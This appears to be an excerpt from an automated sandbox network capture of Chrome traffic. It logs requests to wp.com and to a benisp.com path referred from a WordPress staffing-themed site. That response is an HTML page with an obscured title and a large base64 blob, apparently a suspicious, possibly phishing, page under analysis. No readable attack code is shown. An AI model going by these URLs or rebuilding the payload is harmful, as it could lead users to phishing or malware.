                                                                                                                                                                                                                                                43192.168.2.1149816192.0.77.324436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:43 UTC360OUTGET /i/logo/wpcom-gray-white.png HTTP/1.1
                                                                                                                                                                                                                                                Host: s2.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:44 UTC468INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:44 GMT
                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                Content-Length: 8203
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Last-Modified: Fri, 19 May 2023 02:56:21 GMT
                                                                                                                                                                                                                                                ETag: "6466e555-200b"
                                                                                                                                                                                                                                                Expires: Sun, 20 Apr 2025 09:34:43 GMT
                                                                                                                                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                X-ac: 2.jfk _dca MISS
                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                X-nc: HIT jfk 1
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                2024-12-20 15:45:44 UTC901INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 01 f4 08 03 00 00 00 fc 08 2f b8 00 00 00 72 50 4c 54 45 de de de dd dd dd dc dc dc df df df e1 e1 e1 e3 e3 e3 e7 e7 e7 e8 e8 e8 ea ea ea ee ee ee ef ef ef eb eb eb e4 e4 e4 e2 e2 e2 e6 e6 e6 f1 f1 f1 f4 f4 f4 f6 f6 f6 fa fa fa fb fb fb fd fd fd ff ff ff fe fe fe f7 f7 f7 f5 f5 f5 e0 e0 e0 ec ec ec f2 f2 f2 ed ed ed e9 e9 e9 f8 f8 f8 fc fc fc f9 f9 f9 f3 f3 f3 f0 f0 f0 e5 e5 e5 db db db da da da 72 1c ce 58 00 00 1f 54 49 44 41 54 78 da ec da d9 96 aa 48 10 05 d0 8c 20 11 29 44 64 88 04 65 54 ff ff 1f ef bd 56 f7 ea 55 dd 2d 24 8e 08 67 3f eb 83 eb 18 91 53 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: PNGIHDR/rPLTErXTIDATxH )DdeTVU-$g?S(
                                                                                                                                                                                                                                                2024-12-20 15:45:44 UTC1369INData Raw: 14 fb ff e2 73 27 16 b2 d3 84 26 d2 88 75 d5 da 6d e3 91 fa 7f 11 59 9d cd db 4a 33 4d 6c 1b b2 4e c4 42 e4 a0 c5 ff 0b eb d8 2a f2 29 de 76 b0 b2 8a bd db a0 d8 7f e0 55 6a 1f f9 a7 c6 9e 05 a8 f5 7f 10 f9 32 28 f3 1d 56 93 c5 2a 48 65 50 89 16 ff 37 da 17 32 e8 a4 79 ea 37 89 16 4f c1 1d ee e7 be f1 26 b1 19 4a a0 4f 18 fa 90 21 99 87 d4 7f e3 da c8 80 6e c5 a4 3e 00 d9 bc 08 fb 78 6f 25 fa 92 01 ed 41 d1 9c 66 3f 76 4b 5f d8 c9 d9 c9 80 52 f3 67 3d 12 fa 46 fa 35 cb 5e d8 39 6c a4 5f f7 79 d3 27 1c 16 d2 2f 3d f3 92 2f 5e 53 e9 65 2a 45 9f b8 64 d5 43 bf ab e6 c5 66 ee 19 e9 15 bb fc a9 2f c4 a5 f4 3b d0 42 33 0f 06 2f b0 e8 83 ff d0 a9 f4 3a f1 12 63 1f da b6 c7 21 ab 8b 99 16 fb 51 d1 f2 32 8f 06 56 73 22 f5 d9 86 06 bf 8a a5 1d dd 48 ed e6 ff 22 c5
                                                                                                                                                                                                                                                Data Ascii: s'&umYJ3MlNB*)vUj2(V*HeP72y7O&JO!n>xo%Af?vK_Rg=F5^9l_y'/=/^Se*EdCf/;B3/:c!Q2Vs"H"
                                                                                                                                                                                                                                                2024-12-20 15:45:44 UTC1369INData Raw: bf b5 71 d0 d1 d4 49 ff 7d 7d ec df 10 5b 47 af d5 44 4c 77 9b 72 cd 98 78 bc 26 8a d4 1a 15 32 7b a5 0c 3c e2 72 cb 6c eb 7a d5 5b 67 5b f7 70 e5 2a 2f 79 a5 1e c9 19 9e b2 6d 95 49 ad 71 ba 77 fd 75 cd e5 d3 87 43 fd 6a a7 d1 9b c2 ae 5a 22 e2 8a 85 ef f0 56 11 2f f8 27 f8 f8 65 b0 d1 ea 14 6d 57 4d e3 0d 26 6a 70 22 2f 24 7c 38 2f bd 91 b0 50 b5 52 96 f1 fd c1 c3 77 78 fd aa fe 9c 8f ef bb 6f 9c 4e cc 0c 62 1b a1 e9 79 ba cd a9 5d f9 ca 0f 0c cd 14 dc 8b 74 13 f0 de 53 0d c1 e7 c0 1f 48 50 b4 5b d4 c6 e3 bd 7c e5 f4 45 01 0f df 05 9d d6 18 7d ee a5 49 f0 12 0b 1c 4a e6 fa 82 cc b9 aa 5a dd aa a5 aa 74 60 5f c4 6a fe 2b 4f 25 33 df 8f 0c 7c 5f 59 61 bd d0 1c 37 7b 0f 2f d0 03 5b e3 ca cb 77 9c 99 f8 2e 68 5c 63 74 41 a9 ed bb 87 ce df e4 7f 22 ee fa 71
                                                                                                                                                                                                                                                Data Ascii: qI}}[GDLwrx&2{<rlz[g[p*/ymIqwuCjZ"V/'emWM&jp"/$|8/PRwxoNby]tSHP[|E}IJZt`_j+O%3|_Ya7{/[w.h\ctA"q
                                                                                                                                                                                                                                                2024-12-20 15:45:44 UTC1369INData Raw: de b2 f1 9d 52 0d df 5d b3 a2 1e 58 64 f4 90 34 18 c7 cb 77 bf e2 e2 3b dd 8c 9a 6e e1 5b 64 f4 c4 28 27 8c 90 99 ef c8 b8 76 3d a2 48 83 ee 9a 46 bf 91 3d cd 52 13 34 a2 55 66 be 47 2c 55 fd e5 d2 72 fb 6c 71 b2 b5 c8 e8 3e f4 67 36 73 be 73 1c 6f 3e 7e a5 d1 2b 1f 3a c3 84 df e8 f4 30 33 3a 26 06 be 1b 7a 15 e6 9b 3a 69 18 5d 3b ab 2a 7b 6b 2a 2e d4 9a 86 8f 03 73 7d 35 61 e0 fb b2 d1 23 7a 36 21 32 da 63 f4 42 6a 7d 91 39 ff fe 50 3c 7c a7 93 19 45 50 5b 6d f4 5e ea c5 7a ac 7c a7 8b e2 e1 3b 45 b3 f1 a0 db 46 37 0f 9a 2e 5c e7 f3 e9 f3 dd b4 da 34 c1 7d a3 53 c4 c9 f7 77 ba f3 f0 9d d2 d9 33 82 1c 37 ba 79 2a f6 46 9b b5 01 30 f0 7d 21 f7 de 92 eb 46 37 0f 9a 32 6c 16 a6 f3 f0 1d d7 85 e6 38 f7 8d 1e 28 03 55 31 36 a2 3b 13 df 91 cd bf cc ee 1b 5d c8
                                                                                                                                                                                                                                                Data Ascii: R]Xd4w;n[d('v=HF=R4UfG,Urlq>g6sso>~+:03:&z:i];*{k*.s}5a#z6!2cBj}9P<|EP[m^z|;EF7.\4}Sw37y*F0}!F72l8(U16;]
                                                                                                                                                                                                                                                2024-12-20 15:45:44 UTC1369INData Raw: 00 a0 18 79 51 87 39 b4 3f 69 6a 88 76 df 18 68 8b 41 f9 ae ce 95 db 5c 6b b0 76 46 c8 d4 41 d2 c6 93 a6 4e 6f 93 e8 bc d0 80 8f 17 f9 33 03 0d b5 a5 40 c2 36 51 96 8e 8c 42 7e 7c da d6 88 ef 6f 6b f7 4c 40 55 70 7f a6 f2 2c c9 76 07 f9 70 84 6b d4 c9 b1 1b 9e 34 e5 ef 2f 1b 1b 03 1d 8a 29 df b5 f4 95 88 e7 11 8c 77 b0 5d 0c 7e 9a 27 69 ea f4 26 dd eb 85 80 aa a0 fa dd b6 00 0e 2f 82 00 ac 0e a3 87 9e 41 20 a4 8e f3 7d 38 dd 9f 36 1c a6 7e fd ae d2 b3 f0 59 0b 36 17 23 34 a4 60 7c e7 56 6c 3e 80 ee 43 6b d3 b4 46 7c 1f f0 df 29 02 1b 24 63 62 6c af 72 be a7 98 ef c3 e9 7e 0d dc a1 b8 1a 20 4e 29 dd f7 c0 90 9a 2c 54 52 df c8 5f bf d2 1a a0 7b 48 55 b1 d3 5b ea 3b 03 da 3d 42 2b 31 ea a6 2d 35 85 15 9b 03 ba 07 55 15 a9 bd 95 90 3c ec ed 74 06 54 bc 47 30
                                                                                                                                                                                                                                                Data Ascii: yQ9?ijvhA\kvFANo3@6QB~|okL@Up,vpk4/)w]~'i&/A }86~Y6#4`|Vl>CkF|)$cblr~ N),TR_{HU[;=B+1-5U<tTG0
                                                                                                                                                                                                                                                2024-12-20 15:45:44 UTC1369INData Raw: 26 df 41 7d cc 9b 8d 58 bf 52 42 42 fa 6b b1 a1 86 b1 35 68 7a 3b e3 e8 9b 27 7b 0b 9f 34 01 29 04 54 05 79 00 b2 51 11 1f ee fc 95 f5 4c d4 d3 42 c1 ad d8 71 72 1e 7b 8e fc 00 4a aa ff 17 dc 39 1d 8b 0f 8d 92 34 f1 95 c4 af 2a d8 66 b8 9e 11 e0 1e 47 c1 7f df 45 92 26 7e 57 de 04 56 2c 2a 12 b3 f4 1b c0 7d ee 80 3f 51 7d c3 eb 57 38 dd c3 ab 8a 52 0c 24 97 39 b5 9d e0 78 a4 45 c1 45 04 ba 03 2b 16 d1 5d bb 33 98 13 d1 83 cf 94 cb ce c2 d6 af 80 d6 85 a3 ab 8a 7a 21 c0 c1 d9 7b ee fc a5 9d be 14 2e 69 a2 36 50 f8 b6 18 c3 4b 9f 75 ad c0 b7 32 9b 60 08 ab ae 0a 5c bf c2 37 26 f9 65 71 fc 01 94 d1 a5 2f 7e 70 57 eb 28 01 55 80 e9 ce ad 58 1a f5 55 c0 02 98 75 b6 e6 af 70 cc c6 4d 9a 32 0b e4 26 73 ba 93 23 9a c5 c7 9c c3 df 22 ec 60 40 0a 62 b8 72 5f 11 c6
                                                                                                                                                                                                                                                Data Ascii: &A}XRBBk5hz;'{4)TyQLBqr{J94*fGE&~WV,*}?Q}W8R$9xEE+]3z!{.i6PKu2`\7&eq/~pW(UXUupM2&s#"`@br_
                                                                                                                                                                                                                                                2024-12-20 15:45:44 UTC457INData Raw: 66 52 51 5c 27 65 2f 4e 0a 6c d3 1e c5 ba ce c5 59 5e 5e c2 76 8a 2a f5 19 3e d1 6f a3 26 62 66 a5 bd d3 ae 4e ce 99 11 57 c5 01 f7 6f 4f 89 bd e9 e5 21 26 1f d2 4b 73 0c 76 be ef 69 ad e9 0b a5 75 e5 fb 71 b0 6f 92 b1 cb 3f 2f df 88 fc fb 71 55 e7 f2 0c c6 f4 79 9e 9d bf 18 f2 bc 37 46 3e 21 f2 77 29 f2 b7 21 f2 57 8d bd 1d e4 85 e5 35 1e a6 2d 80 d5 ee 2c 2f aa db e3 8e 7d 21 44 a7 a4 90 97 63 d2 98 10 f9 72 88 bd ba 93 97 92 85 11 9e 98 2f 8c 98 e2 4b 21 2f c2 a4 3b 85 c8 d7 5a ee a5 bc 80 21 8c 18 75 7d 35 4c d3 21 93 6f d5 27 31 16 f9 ca 88 75 9c 64 df 96 f8 18 54 48 fc db 72 cf 91 f8 16 73 3f 74 46 d6 93 25 bb 0a 17 f2 ef 46 4c fe 31 cd 65 05 fd b9 39 e1 3a fe 3a b9 57 f1 a1 2c 64 41 a6 bb 06 1e 21 f1 97 42 ac bc 5d 78 5e 24 f8 a2 bb b6 11 96 f8 eb
                                                                                                                                                                                                                                                Data Ascii: fRQ\'e/NlY^^v*>o&bfNWoO!&Ksviuqo?/qUy7F>!w)!W5-,/}!Dcr/K!/;Z!u}5L!o'1udTHrs?tF%FL1e9::W,dA!B]x^$


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                44192.168.2.1149822192.0.76.34436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:44 UTC691OUTGET /c.gif?u=https%3A%2F%2Fbenisp.com%2Fdan%2Fdann%2Fdannn&r=&b=240074490&p=22&rand=0.1339836907307579 HTTP/1.1
                                                                                                                                                                                                                                                Host: pixel.wp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:45 UTC222INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:45 GMT
                                                                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                                                                Content-Length: 50
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                2024-12-20 15:45:45 UTC50INData Raw: 47 49 46 38 39 61 06 00 05 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 06 00 05 00 00 02 09 0c 62 78 89 cd 6a 80 0c 05 00 3b
                                                                                                                                                                                                                                                Data Ascii: GIF89a!,bxj;


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                45192.168.2.1149823192.185.195.2034436716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-20 15:45:45 UTC731OUTGET /dan/dann/dannn HTTP/1.1
                                                                                                                                                                                                                                                Host: benisp.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                Referer: https://dnearymedahealthstaffing.wordpress.com/
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-20 15:45:46 UTC209INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 15:45:45 GMT
                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                Last-Modified: Fri, 20 Dec 2024 15:15:30 GMT
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Content-Length: 353562
                                                                                                                                                                                                                                                2024-12-20 15:45:46 UTC7983INData Raw: 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 2a 2a 2a 2a 2d 2d 2d 2a 2a 2a 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 53 65 67 6f 65 20 55 49
                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>****---***</title> <style> body { font-family: "Segoe UI", "Segoe UI
                                                                                                                                                                                                                                                2024-12-20 15:45:46 UTC8000INData Raw: 79 47 50 61 45 4a 47 54 33 78 55 36 74 68 59 32 43 62 37 6f 65 66 72 47 64 44 44 55 66 5a 31 53 63 48 41 4c 77 47 31 53 47 44 62 38 65 70 75 63 31 34 49 4b 58 62 46 6a 51 71 44 32 35 44 58 2b 2f 48 79 6a 55 71 2b 73 47 44 47 73 2f 50 4c 78 37 48 6a 46 30 79 68 63 6a 45 4b 45 76 66 5a 4a 69 68 4b 50 49 73 55 66 6a 37 62 66 35 42 4d 56 31 6f 65 4c 46 50 53 78 37 61 46 2b 32 48 44 4d 77 67 58 38 44 54 59 68 64 6e 37 38 32 2f 6e 62 71 33 47 4c 6b 63 2b 4a 4f 46 36 59 63 6c 6e 36 53 76 53 79 64 53 73 64 59 48 65 42 75 69 4f 44 7a 66 78 64 7a 48 4f 59 4b 71 44 5a 42 46 4a 39 73 38 62 58 5a 6b 74 4c 48 43 41 46 6a 4c 4a 74 4b 55 57 4a 64 54 4e 70 47 2b 62 31 37 32 76 53 37 67 35 39 33 33 33 65 46 50 6a 31 55 79 42 75 44 43 4e 2f 2b 72 74 68 73 78 36 5a 49 68 51
                                                                                                                                                                                                                                                Data Ascii: yGPaEJGT3xU6thY2Cb7oefrGdDDUfZ1ScHALwG1SGDb8epuc14IKXbFjQqD25DX+/HyjUq+sGDGs/PLx7HjF0yhcjEKEvfZJihKPIsUfj7bf5BMV1oeLFPSx7aF+2HDMwgX8DTYhdn782/nbq3GLkc+JOF6Ycln6SvSydSsdYHeBuiODzfxdzHOYKqDZBFJ9s8bXZktLHCAFjLJtKUWJdTNpG+b172vS7g59333eFPj1UyBuDCN/+rthsx6ZIhQ
                                                                                                                                                                                                                                                2024-12-20 15:45:46 UTC8000INData Raw: 6d 38 6f 78 63 78 73 2f 66 30 74 71 66 52 32 61 76 32 64 35 55 2b 41 50 53 59 48 51 2b 65 6c 44 6b 56 7a 4a 62 31 53 4d 6f 6f 49 56 4c 42 35 46 68 6b 63 48 65 61 49 69 50 70 4c 74 78 59 69 75 55 4f 46 50 56 39 68 72 6f 65 68 62 46 66 68 47 78 58 7a 31 30 35 68 37 72 47 45 4a 45 75 79 72 38 49 73 45 41 34 55 30 66 30 69 53 76 64 65 2b 70 41 42 37 72 59 77 31 64 5a 6a 33 45 61 5a 69 48 41 56 6c 4d 71 68 36 77 34 33 6e 35 71 41 52 6a 69 66 6d 49 63 65 7a 58 4a 74 42 4b 61 31 34 4f 4c 37 6c 57 6f 42 6a 65 48 34 2f 4f 4f 42 4f 79 63 49 45 5a 4d 56 37 46 37 4e 55 73 48 6a 76 62 66 4d 68 63 5a 78 78 4f 6e 49 69 55 5a 78 77 47 6d 51 38 68 53 4b 46 37 34 45 51 74 36 4d 6f 41 5a 4a 53 67 70 4a 39 74 50 4c 39 6d 6e 41 39 62 69 31 6d 4e 6e 56 63 61 75 49 51 58 68 7a
                                                                                                                                                                                                                                                Data Ascii: m8oxcxs/f0tqfR2av2d5U+APSYHQ+elDkVzJb1SMooIVLB5FhkcHeaIiPpLtxYiuUOFPV9hroehbFfhGxXz105h7rGEJEuyr8IsEA4U0f0iSvde+pAB7rYw1dZj3EaZiHAVlMqh6w43n5qARjifmIcezXJtBKa14OL7lWoBjeH4/OOBOycIEZMV7F7NUsHjvbfMhcZxxOnIiUZxwGmQ8hSKF74EQt6MoAZJSgpJ9tPL9mnA9bi1mNnVcauIQXhz
                                                                                                                                                                                                                                                2024-12-20 15:45:46 UTC8000INData Raw: 73 73 5a 56 69 51 39 7a 46 31 69 4d 74 6f 4d 6a 46 47 4a 73 62 50 38 69 56 79 61 67 37 4e 4e 43 6d 67 6d 45 53 42 68 65 45 58 78 33 66 51 45 62 44 70 56 38 72 4d 68 30 38 59 57 76 72 6a 75 4e 6e 77 30 75 4b 52 78 72 34 77 44 62 31 34 44 39 35 4f 76 36 4a 48 4d 47 2f 47 6c 4c 32 58 36 6e 37 51 6a 73 61 68 77 4c 47 2f 34 52 76 4e 35 6a 33 78 54 34 78 42 53 49 69 48 54 75 55 66 42 42 30 76 49 78 37 57 48 50 36 50 56 4d 2b 6b 46 73 4b 31 53 67 43 49 48 76 56 49 79 69 78 53 68 55 2f 47 34 55 4c 32 61 42 77 6f 73 57 65 4a 72 69 4d 65 66 6f 69 79 63 70 38 72 56 50 46 70 63 67 57 53 56 78 2f 69 66 6d 77 34 2b 4c 57 74 32 34 39 70 68 51 75 6c 51 37 53 48 42 5a 6f 36 31 79 76 67 53 69 48 34 33 4f 32 47 47 47 41 34 4f 48 61 68 44 4a 2f 75 4a 52 69 39 2b 64 55 4c 56
                                                                                                                                                                                                                                                Data Ascii: ssZViQ9zF1iMtoMjFGJsbP8iVyag7NNCmgmESBheEXx3fQEbDpV8rMh08YWvrjuNnw0uKRxr4wDb14D95Ov6JHMG/GlL2X6n7QjsahwLG/4RvN5j3xT4xBSIiHTuUfBB0vIx7WHP6PVM+kFsK1SgCIHvVIyixShU/G4UL2aBwosWeJriMefoiycp8rVPFpcgWSVx/ifmw4+LWt249phQulQ7SHBZo61yvgSiH43O2GGGA4OHahDJ/uJRi9+dULV
                                                                                                                                                                                                                                                2024-12-20 15:45:46 UTC8000INData Raw: 35 61 51 54 69 58 32 4d 75 65 37 31 31 69 63 31 6a 4d 32 55 2f 6d 39 66 41 5a 57 46 69 6a 55 47 33 2b 68 75 79 66 48 68 68 6c 37 63 35 4a 75 76 42 4c 52 39 33 43 78 4f 2b 4f 39 30 44 36 4e 41 41 5a 2f 6c 5a 4e 4f 76 59 54 43 58 51 33 68 31 72 32 39 42 6f 39 35 41 47 79 4a 7a 33 41 6a 6f 33 6c 4c 79 54 2f 32 2b 45 37 34 57 31 4d 69 39 71 53 32 34 55 71 6d 44 33 2f 67 4c 62 51 74 75 55 39 63 38 72 44 4f 79 6e 41 55 55 50 6b 57 31 6f 54 71 57 7a 31 52 33 57 4c 2b 71 44 59 42 74 77 51 69 6a 5a 38 44 4f 78 34 6e 55 4b 73 43 38 69 5a 39 38 64 33 6d 4f 64 6f 34 50 71 47 42 52 64 4b 78 4d 73 36 37 54 77 4d 50 37 45 33 35 71 62 49 73 48 47 39 63 4c 42 7a 39 6c 74 65 4b 47 4d 51 2f 59 76 2f 78 6a 2f 2b 4a 2f 75 74 45 63 4a 4b 78 30 42 57 46 4d 51 53 62 76 4b 49 51
                                                                                                                                                                                                                                                Data Ascii: 5aQTiX2Mue711ic1jM2U/m9fAZWFijUG3+huyfHhhl7c5JuvBLR93CxO+O90D6NAAZ/lZNOvYTCXQ3h1r29Bo95AGyJz3Ajo3lLyT/2+E74W1Mi9qS24UqmD3/gLbQtuU9c8rDOynAUUPkW1oTqWz1R3WL+qDYBtwQijZ8DOx4nUKsC8iZ98d3mOdo4PqGBRdKxMs67TwMP7E35qbIsHG9cLBz9lteKGMQ/Yv/xj/+J/utEcJKx0BWFMQSbvKIQ
                                                                                                                                                                                                                                                2024-12-20 15:45:46 UTC8000INData Raw: 34 47 77 4e 34 31 52 72 4a 79 59 43 74 47 44 74 4f 48 6a 77 2b 50 2b 4b 35 35 6e 75 56 62 79 4e 2f 32 54 74 66 45 4c 4e 2b 51 46 79 45 79 54 30 6c 68 6a 69 37 6c 35 4a 69 48 44 49 42 55 7a 54 5a 37 68 73 50 38 59 75 5a 74 42 4f 64 74 6a 33 37 51 39 65 2f 63 58 2f 37 4b 38 56 46 78 45 55 63 46 44 31 6a 6a 5a 6a 57 78 4b 74 4f 32 63 63 63 63 78 43 6c 57 30 4a 73 56 52 6f 4b 4b 6d 62 34 7a 52 52 34 75 4a 52 6c 6b 6f 54 45 48 44 35 77 53 6d 4a 61 30 77 46 63 35 58 4a 63 61 33 4f 51 7a 4b 52 51 47 7a 55 72 69 59 32 6a 4b 75 55 53 33 4e 47 42 32 47 36 70 4e 42 4b 4b 2b 76 75 66 58 66 36 76 49 68 45 44 79 50 54 78 31 43 46 70 44 50 2f 4e 59 47 2f 56 4f 71 34 71 45 46 47 74 35 4f 48 62 47 4f 38 6e 4b 75 4f 43 77 63 45 61 33 42 77 5a 57 42 74 42 58 45 47 70 4c 78
                                                                                                                                                                                                                                                Data Ascii: 4GwN41RrJyYCtGDtOHjw+P+K55nuVbyN/2TtfELN+QFyEyT0lhji7l5JiHDIBUzTZ7hsP8YuZtBOdtj37Q9e/cX/7K8VFxEUcFD1jjZjWxKtO2ccccxClW0JsVRoKKmb4zRR4uJRlkoTEHD5wSmJa0wFc5XJca3OQzKRQGzUriY2jKuUS3NGB2G6pNBKK+vufXf6vIhEDyPTx1CFpDP/NYG/VOq4qEFGt5OHbGO8nKuOCwcEa3BwZWBtBXEGpLx
                                                                                                                                                                                                                                                2024-12-20 15:45:46 UTC8000INData Raw: 59 2b 2f 50 42 65 70 51 61 48 6b 36 39 54 58 6e 4c 78 66 4c 53 39 6e 54 66 7a 44 41 62 47 67 45 6b 4b 54 49 77 68 61 43 59 31 4c 35 57 43 43 62 6d 31 4e 63 31 41 37 73 53 77 47 55 46 55 32 75 53 51 4a 2b 36 6a 6c 72 49 62 30 6f 63 4f 6b 32 43 37 5a 36 54 65 6a 2b 46 4f 66 44 38 61 59 48 6e 68 73 7a 69 64 38 5a 33 31 79 73 33 75 74 59 62 59 79 77 4b 6e 77 59 64 69 74 76 4f 7a 34 5a 4e 2b 77 6b 56 49 73 4c 64 6f 6b 39 48 42 63 62 33 68 57 41 64 72 59 4f 49 41 65 69 42 33 6b 57 73 77 34 76 46 6e 53 48 59 30 6f 41 38 4e 4f 34 6a 57 2b 58 54 58 76 53 6c 57 52 59 64 62 2f 7a 41 53 45 52 70 76 73 4e 6d 53 79 74 30 2f 78 41 67 59 79 39 68 34 66 55 49 65 47 5a 5a 47 52 75 7a 57 79 39 2b 37 33 69 48 79 4d 51 44 31 34 39 6a 4e 4d 30 70 44 70 55 76 75 44 66 6c 6d 31
                                                                                                                                                                                                                                                Data Ascii: Y+/PBepQaHk69TXnLxfLS9nTfzDAbGgEkKTIwhaCY1L5WCCbm1Nc1A7sSwGUFU2uSQJ+6jlrIb0ocOk2C7Z6Tej+FOfD8aYHnhszid8Z31ys3utYbYywKnwYditvOz4ZN+wkVIsLdok9HBcb3hWAdrYOIAeiB3kWsw4vFnSHY0oA8NO4jW+XTXvSlWRYdb/zASERpvsNmSyt0/xAgYy9h4fUIeGZZGRuzWy9+73iHyMQD149jNM0pDpUvuDflm1
